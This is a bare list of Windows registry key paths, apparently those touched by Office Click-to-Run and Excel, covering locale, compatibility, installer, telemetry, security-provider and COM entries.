HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\ImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\AuthenticationCapabilities
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\CoInitializeSecurityAppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\DeferredCoInitializeSecurityServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\DefaultRpcStackSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalSystemNetworkRestricted\SystemCritical
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\svchost.exe
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceMain
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\IgnoreShimmedAppCheck
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PcaSvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AA559E2D
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\ExecutablesToExclude
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows NT\CurrentVersion
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Quarantined
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Quarantined\C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Monitored
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Monitored\C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\ExperimentDogfood
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\DevInstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\Flight\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FirstSessionTriggered
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2476309959-3960023044-3115063449-1000\Components\A725889A5DF965C4E84A0253A39A5952
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Products
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Products
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Products\00006109C80000000000000000F01FEC
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Products\00006109C80000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109C80000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2476309959-3960023044-3115063449-1000\Installer\Products\00006109E70000000000000000F01FEC
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Installer\Products\00006109E70000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109E70000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E70000000000000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E70000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\FilesPaths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\ClientTelemetry
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\DeferredConfigs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EcsRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\EdgeRequestPending
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightNumberlines
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\ClientFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\MID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\DisableFirstRun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\SubscriptionCustomerLicenseInfo
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\15.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\VersionToReport
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PipelineServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService\9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LsaExtensionConfig\SspiCli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\LsaExtensionConfig\SspiCli\CheckSignatureRoutine
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders\SecurityProviders
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\SspiCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Comment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\RpcId
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Version
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\credssp.dll\TokenSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\SaslProfiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ExecutingScenario
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleTimerInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\AppUserIdleResetInterval
HKEY_CURRENT_USER\Software\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InsecureQI
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Scenario\UPDATE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Scenario\UPDATE\DisplayLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\OfficeClickToRun.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_UNICODE_HANDLE_CLOSING_CALLBACK\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\ForceDefaultAutoLogonLevelLow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\OfficeClickToRun.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1A00
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\FlightingVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\PackageFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\excel.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\QMEnable
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\IsProviderIdFetchedFromLicensedName
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\Common\DevInstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\E40F7BF0-08F2-40AC-938C-9EE4BF3260FF\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\excel\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableExperimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\excel\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\FirstSessionTriggered
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0BC77486A266BF84FAE259379C82967F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E40100B0F7ED50A4AABEA3DC36A2F6A6\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1CC1F61F05EDA1948816E2A04270A20C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0136EEA3C5C1DB040BBB4272DFA05234\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\8E982B78D763473478502181932C13E0\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E29400AB2B7AA47439822EDB9310C437\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\91911CC5AA25BA64ABAAA692E02F2D30\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\E8DF4AEBDD158AE438C8F2F6D20AD7AC\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A5F07DEC661BF284EA6075DA5F525BAA\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2E6D33DF58B7A854083E8402A99D91B9\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0D692E8379026B8448157BD6D7916F3E\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\39852B3E9E8B1EB48AE06D034A14262D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\49A2B0FF5E149204B8A8FF1E28D32963\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01B4EDCF03C143E4793454CC8B37A96D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\2921D0D2052C0124CA0823230A7CF03C\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A31077A24A584C4984DC332F0E08910\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A0E44963B01D7B149B193F9533340C35\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\203B9BEF0241105418918A660830D016\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5DD98A0D7B791B84993A4B734D9CB013\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\DE6518C60D100DC4D8531B45F3D892C7\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\7016BA370EA4E9E419714B97BAC401E8\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\46CC12D7C7A12C24B8D82AD7D20C00A5\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\536F52269804BFE4CA6C3B9825FC4C94\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\CF78260F2BE7BC8408640B1261F73B2D\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\01313DC250A655A4BA615BB9AABF7378\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\4D16D1323CC1A074FA09BBF442DE9028\00006109F00000000000000000F01FEC
